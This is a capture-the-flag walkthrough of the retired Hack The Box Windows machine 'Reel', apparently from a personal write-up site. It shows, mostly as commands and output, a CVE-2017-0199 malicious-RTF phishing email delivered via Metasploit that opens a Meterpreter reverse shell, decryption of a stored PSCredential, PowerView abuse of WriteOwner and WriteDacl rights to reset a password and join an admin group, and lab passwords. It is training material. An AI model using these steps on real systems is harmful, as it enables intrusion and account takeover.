Skip to content

Reel

Box details
OS Windows
Difficulty Hard
Status Retired
Release June 2018
Completed August 2025

Enumeration

Nmap scan of the target:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
$ nmap -sV -sC -PN -p- -oA reel_nmap 10.10.10.77
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-02 17:06 CEST
Nmap scan report for 10.10.10.77
Host is up (0.028s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-29-18  12:19AM       <DIR>          documents
| ftp-syst:
|_  SYST: Windows_NT
22/tcp    open  ssh          OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
|   2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
|   256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_  256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp    open  smtp?
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
|     220 Mail Service ready
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
|     220 Mail Service ready
|     sequence of commands
|   Hello:
|     220 Mail Service ready
|     EHLO Invalid domain address.
|   Help:
|     220 Mail Service ready
|     DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|   SIPOptions:
|     220 Mail Service ready
|     sequence of commands
|   TerminalServerCookie:
|     220 Mail Service ready
|_    sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2012 R2 Standard 9600 microsoft-ds (workgroup: HTB)
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49159/tcp open  msrpc        Microsoft Windows RPC
...
Service Info: Host: REEL; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:0:2:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-08-02T15:11:56
|_  start_date: 2025-08-02T15:04:42
| smb-os-discovery:
|   OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
|   OS CPE: cpe:/o:microsoft:windows_server_2012::-
|   Computer name: REEL
|   NetBIOS computer name: REEL\x00
|   Domain name: HTB.LOCAL
|   Forest name: HTB.LOCAL
|   FQDN: REEL.HTB.LOCAL
|_  System time: 2025-08-02T16:11:55+01:00
|_clock-skew: mean: -19m33s, deviation: 34m36s, median: 25s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required

No open UDP ports were found.

The target is running an unsecured public FTP server that can be accessed as an anonymous user:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
$ ftp 10.10.10.77
Connected to 10.10.10.77.
220 Microsoft FTP Service
Name (10.10.10.77:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||41001|)
125 Data connection already open; Transfer starting.
05-29-18  12:19AM       <DIR>          documents
226 Transfer complete.
ftp> cd documents
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||41003|)
125 Data connection already open; Transfer starting.
05-29-18  12:19AM                 2047 AppLocker.docx
05-28-18  02:01PM                  124 readme.txt
10-31-17  10:13PM                14581 Windows Event Forwarding.docx

Downloaded all three documents to look for anything of interest in them:

readme.txt

1
2
3
please email me any rtf format procedures - I'll review and convert.

new format / converted documents will be saved here.

AppLocker.docx

1
AppLocker procedure to be documented - hash rules for exe, msi and scripts (ps1,vbs,cmd,bat,js) are in effect.
Windows Event Forwarding.docx 
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
# get winrm config

winrm get winrm/config


# gpo config

O:BAG:SYD:(A;;0xf0005;;;SY)(A;;0x5;;;BA)(A;;0x1;;;S-1-5-32-573)(A;;0x1;;;NS)        // add to GPO
Server=http://WEF.HTB.LOCAL:5985/wsman/SubscriptionManager/WEC,Refresh=60   // add to GPO (60 seconds)

on source computer: gpupdate /force

# prereqs

start Windows Remote Management service on source computer
add builtin\network service account to "Event Log Readers" group on collector server

# list subscriptions / export

C:\Windows\system32>wecutil es > subs.txt

# check subscription status

C:\Windows\system32>wecutil gr "Account Currently Disabled"

Subscription: Account Currently Disabled
        RunTimeStatus: Active
        LastError: 0
        EventSources:
                LAPTOP12.HTB.LOCAL
                        RunTimeStatus: Active
                        LastError: 0
                        LastHeartbeatTime: 2017-07-11T13:27:00.920


# change pre-rendering setting in multiple subscriptions

for /F "tokens=*" %i in (subs.txt) DO wecutil ss "%i" /cf:Events


# export subscriptions to xml

for /F "tokens=*" %i in (subs.txt) DO wecutil gs "%i" /f:xml >> "%i.xml"

# import subscriptions from xml

wecutil cs "Event Log Service Shutdown.xml"
wecutil cs "Event Log was cleared.xml"

# if get error "The locale specific resource for the desired message is not present", change subscriptions to Event format (won't do any hard running command even if they already are in this format)

1.

for /F "tokens=*" %i in (subs.txt) DO wecutil ss "%i" /cf:Events

2.

Under Windows Regional Settings, on the Formats tab, change the format to "English (United States)"

# check subscriptions are being created on the source computer

Event Log: /Applications and Services Logs/Microsoft/Windows/Eventlog-ForwardingPlugin/Operational


#### troubleshooting WEF

collector server -> subscription name -> runtime status

gpupdate /force (force checkin, get subscriptions)

check Microsoft/Windows/Eventlog-ForwardingPlugin/Operational for errors

The readme.txt suggests emailing .rtf files for converting them to .docx. Given that the target is running an SMTP server, it's likely that this hints towards a kind of phishing attack. A valid email address or username is still needed in order to set up the attack.

Analyzing the metadata in Windows Event Forwarding.docx reveals a possible username:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
$ exiftool Windows\ Event\ Forwarding.docx
ExifTool Version Number         : 13.25
File Name                       : Windows Event Forwarding.docx
Directory                       : .
File Size                       : 15 kB
File Modification Date/Time     : 2017:10:31 22:13:23+01:00
File Access Date/Time           : 2025:08:02 20:26:33+02:00
File Inode Change Date/Time     : 2025:08:02 20:27:00+02:00
File Permissions                : -rw-rw-r--
File Type                       : DOCX
File Type Extension             : docx
MIME Type                       : application/vnd.openxmlformats-officedocument.wordprocessingml.document
...
Creator                         : nico@megabank.com
Revision Number                 : 4
Create Date                     : 2017:10:31 18:42:00Z
Modify Date                     : 2017:10:31 18:51:00Z
...

Note

The information above can usually also be found in the Document Properties dialog in a word processor like LibreOffice Write. However, in the current case, it appears the document is semi-corrupt. When LibreOffice Write attempts to repair it, it also strips the metadata containing the author username.

Before proceeding, it's helpful to verify if the email address found above (nico@megabank.com) is valid. This can be done by connecting to the SMTP server on the target and using VRFY or RCPT TO and check if the server confirms that the address exists:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
$ telnet 10.10.10.77 25
Trying 10.10.10.77...
Connected to 10.10.10.77.
Escape character is '^]'.
220 Mail Service ready
HELO test.com
250 Hello.
VRFY nico@megabank.com 
502 VRFY disallowed. # (1)
MAIL FROM:<test@test.com>
250 OK
RCPT TO:<nico@megabank.com> # (2)
250 OK
  1. The VRFY method is the simplest to test with, but it's not allowed in the current case.
  2. Attempting to send an email to nico@megabank.com is another method. In this case the server confirms that the address exists. If a non-existent megabank.com address is specified, the server would respond with 550 Unknown user.

Foothold

The call for RTF documents in readme.txt hints towards the target being vulnerable to CVE-2017-0199, which is a vulnerability in Microsoft Office and WordPad that can cause RCE through a malicious document. The vulnerability can be exploited in several ways, but the general idea is that the vulnerability will trigger a HTTP GET request to an attacker controlled URL in the malicious document. If the URL points to a HTML application (.hta) file, the code in the file (such as a reverse shell payload) will get executed by the victim host.

There is a Metasploit module (windows/fileformat/office_word_hta) for exploiting this vulnerability. The module is almost fully self-contained, as it takes care of both generating the malicious RTF file, setting up a web server for the call back and delivering a reverse shell payload.

Configured the module like so:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
msf6 exploit(windows/fileformat/office_word_hta) > options

Module options (exploit/windows/fileformat/office_word_hta):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  document.doc     yes       The file name.
   SRVHOST   10.10.16.6       yes       The local host or network interface to listen
                                         on. This must be an address on the local mac
                                        hine or 0.0.0.0 to listen on all addresses.
   SRVPORT   8080             yes       The local port to listen on.
   SSL       false            no        Negotiate SSL for incoming connections
   SSLCert                    no        Path to a custom SSL certificate (default is
                                        randomly generated)
   URIPATH   default.hta      yes       The URI to use for the HTA file


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, pr
                                        ocess, none)
   LHOST     10.10.16.6       yes       The listen address (an interface may be speci
                                        fied)
   LPORT     4444             yes       The listen port

Once the exploit is launched, the only remaining step is to deliver the malicious file by email using a tool like sendemail:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
$ sendemail -f test@megabank.htb -t nico@megabank.htb -u RTF -m "see attached" -a /home/kali/.msf4/local/document.doc -s 10.10.10.77 -v
Aug 02 23:58:02 kali sendemail[1713853]: DEBUG => Connecting to 10.10.10.77:25
Aug 02 23:58:02 kali sendemail[1713853]: DEBUG => My IP address is: 10.10.16.6
Aug 02 23:58:02 kali sendemail[1713853]: SUCCESS => Received:   220 Mail Service ready
Aug 02 23:58:02 kali sendemail[1713853]: INFO => Sending:       EHLO kali.sbox.miso.lan
Aug 02 23:58:02 kali sendemail[1713853]: SUCCESS => Received:   250-REEL, 250-SIZE 20480000, 250-AUTH LOGIN PLAIN, 250 HELP
Aug 02 23:58:02 kali sendemail[1713853]: INFO => Sending:       MAIL FROM:<test@megabank.htb>
Aug 02 23:58:02 kali sendemail[1713853]: SUCCESS => Received:   250 OK
Aug 02 23:58:02 kali sendemail[1713853]: INFO => Sending:       RCPT TO:<nico@megabank.htb>
Aug 02 23:58:02 kali sendemail[1713853]: SUCCESS => Received:   250 OK
Aug 02 23:58:02 kali sendemail[1713853]: INFO => Sending:       DATA
Aug 02 23:58:02 kali sendemail[1713853]: SUCCESS => Received:   354 OK, send.
Aug 02 23:58:02 kali sendemail[1713853]: INFO => Sending message body
Aug 02 23:58:02 kali sendemail[1713853]: Setting content-type: text/plain
Aug 02 23:58:02 kali sendemail[1713853]: DEBUG => Sending the attachment [/home/kali/.msf4/local/document.doc]
Aug 02 23:58:02 kali sendemail[1713853]: SUCCESS => Received:   250 Queued (0.062 seconds)
Aug 02 23:58:02 kali sendemail[1713853]: Email was sent successfully!  From: <test@megabank.htb> To: <nico@megabank.htb> Subject: [RTF] Attachment(s): [document.doc] Server: [10.10.10.77:25]

Got the call back in msfconsole after a few moments with a reverse shell as user nico:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
msf6 exploit(windows/fileformat/office_word_hta) > run
[*] Exploit running as background job 0.
[*] Server started.
[*] Sending stage (177734 bytes) to 10.10.10.77
[*] Meterpreter session 1 opened (10.10.16.6:4444 -> 10.10.10.77:61700) at 2025-08-02 23:58:19 +0200

msf6 exploit(windows/fileformat/office_word_hta) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: HTB\nico

Used shell to get a CMD shell, then navigated to C:\Users\nico\Desktop and got the user flag.

Lateral Movement (Nico → Tom)

There is an additional file on user nico's desktop, cred.xml, that contains a PSCredential object for HTB\Tom:

cred.xml

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
    <TN RefId="0">
    <T>System.Management.Automation.PSCredential</T>
    <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
    <S N="UserName">HTB\Tom</S>
    <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692</SS>
    </Props>
</Obj>
</Objs>

The PSCredential object can be decrypted from the XML file directly with PowerShell:

1
2
3
4
5
6
7
8
c:\Users\nico\Desktop>powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *"
powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *"


UserName       : Tom
Password       : 1ts-mag1c!!!
SecurePassword : System.Security.SecureString
Domain         : HTB

Note

PSCredential uses the Windows Data Protection API (DPAPI) to store the credential securely. As this storage is user and machine specific, the object has to be decrypted on the same host as it was stored on.

Used the password above to log in to the target over SSH as tom.

Lateral Movement (Tom → Claire)

There is a folder on tom's desktop named AD Audit. Inside, there is a note with some findings:

note.txt

1
2
3
4
5
6
Findings:

Surprisingly no AD attack paths from user to Domain Admin (using default shortest path
query).

Maybe we should re-run Cypher query against other groups we've created.

There is also a subfolder named Bloodhound\Ingestors that contains binaries for BloodHound and SharpHound, as well as a file named acls.csv. Presumably this contains the results of the audit mentioned above.

Note

BloodHound has long since the box was released abandoned CSV data files in favor of JSON. Modern versions of BloodHound no longer support CSV, which means that the ACL data would have to be recollected with a newer ingestor in order to be viewable in modern versions of BloodHound.

Unfortunately, the AppLocker policy in effect on the box prevent running SharpHound.exe, limiting the choice of ingestor to the PowerShell variant only. However, as the version of PowerShell present on the box (4.0) is too old to run any of the later versions of the SharpHound ingestor, this option also won't work.

Without delving too deep into BloodHound-legacy and old versions of SharpHound, the simplest alternative in this case is to enumerate using PowerView instead.

The next step is to enumerate what access tom has inside the domain. According to PowerView, tom has a WriteOwner privilege over claire:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
PS C:\Users\tom> $sid = Convert-NameToSid tom
PS C:\Users\tom> Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}

AceType               : AccessAllowed
ObjectDN              : CN=Claire Danes,CN=Users,DC=HTB,DC=LOCAL
ActiveDirectoryRights : WriteOwner
OpaqueLength          : 0
ObjectSID             : S-1-5-21-2648318136-3688571242-2924127574-1130
InheritanceFlags      : None
BinaryLength          : 36
IsInherited           : False
IsCallback            : False
PropagationFlags      : None
SecurityIdentifier    : S-1-5-21-2648318136-3688571242-2924127574-1107
AccessMask            : 524288
AuditFlags            : None
AceFlags              : None
AceQualifier          : AccessAllowed

The privilege can be abused to reset claire's password in three steps:

  1. Take ownership over claire's ACL as tom: 
    1
    PS> Set-DomainObjectOwner -identity claire -OwnerIdentity tom
  2. Give tom permission to change the password on the ACL: 
    1
    PS> Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword
  3. Use the privilege to reset claire's password:
    1. Store tom's credentials in a PSCredential object: 
      1
2
      $SecPassword = ConvertTo-SecureString '1ts-mag1c!!!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('HTB\tom', $SecPassword)
    2. Create a PSCredential object for the new password for claire: 
      1
      PS> $newpass = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
    3. Reset the password: 
      1
2
3
4
      PS> Set-DomainUserPassword -Identity claire -AccountPassword $newpass -Credential $Cred -Verbose
VERBOSE: [Get-PrincipalContext] Using alternate credentials
VERBOSE: [Set-DomainUserPassword] Attempting to set the password for user 'claire'
VERBOSE: [Set-DomainUserPassword] Password for user 'claire' successfully reset

Privilege Escalation (Administrator)

Running PowerView on claire reveals an ACL that gives claire WriteDacl rights on the group Backup_Admins:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
PS C:\Users\tom> Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}

AceType               : AccessAllowed
ObjectDN              : CN=Backup_Admins,OU=Groups,DC=HTB,DC=LOCAL
ActiveDirectoryRights : ReadProperty, WriteProperty, GenericExecute, WriteDacl
OpaqueLength          : 0
ObjectSID             : S-1-5-21-2648318136-3688571242-2924127574-1135
InheritanceFlags      : ContainerInherit
BinaryLength          : 36
IsInherited           : False
IsCallback            : False
PropagationFlags      : None
SecurityIdentifier    : S-1-5-21-2648318136-3688571242-2924127574-1130
AccessMask            : 393268
AuditFlags            : None
AceFlags              : ContainerInherit
AceQualifier          : AccessAllowed

The WriteDacl privilege can be abused to add claire to the Backup_Admins group:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
claire@REEL C:\Users\claire>net group backup_admins claire /add
The command completed successfully.

claire@REEL C:\Users\claire>net group backup_admins
Group name     Backup_Admins
Comment

Members

-------------------------------------------------------------------------------
claire                   ranj
The command completed successfully.

As a member of Backup_Admins, claire has access to C:\Users\Administrator:

1
2
3
4
5
claire@REEL C:\Users>icacls Administrator
Administrator NT AUTHORITY\SYSTEM:(OI)(CI)(F)
              HTB\Backup_Admins:(OI)(CI)(F)
              HTB\Administrator:(OI)(CI)(F)
              BUILTIN\Administrators:(OI)(CI)(F)

There is a Backup Scripts folder on Administrator's desktop with the following contents:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
claire@REEL C:\Users\Administrator\Desktop>dir "Backup Scripts"
 Volume in drive C has no label.
 Volume Serial Number is CEBA-B613

 Directory of C:\Users\Administrator\Desktop\Backup Scripts

11/02/2017  10:47 PM    <DIR>          .
11/02/2017  10:47 PM    <DIR>          ..
11/04/2017  12:22 AM               845 backup.ps1
11/02/2017  10:37 PM               462 backup1.ps1
11/04/2017  12:21 AM             5,642 BackupScript.ps1
11/02/2017  10:43 PM             2,791 BackupScript.zip
11/04/2017  12:22 AM             1,855 folders-system-state.txt
11/04/2017  12:22 AM               308 test2.ps1.txt
               6 File(s)         11,903 bytes
               2 Dir(s)   4,773,634,048 bytes free

One of the files, BackupScript.ps1 contains clear-text credentials for the Administrator user:

1
2
3
4
5
6
7
8
claire@REEL C:\Users\Administrator\Desktop\Backup Scripts>type BackupScript.ps1
# admin password
$password="Cr4ckMeIfYouC4n!"

#Variables, only Change here
$Destination="\\BACKUP03\BACKUP" #Copy the Files to this Location
$Versions="50" #How many of the last Backups you want to keep
...

Used the password above to connect to the target over SSH as Administrator and get the root flag.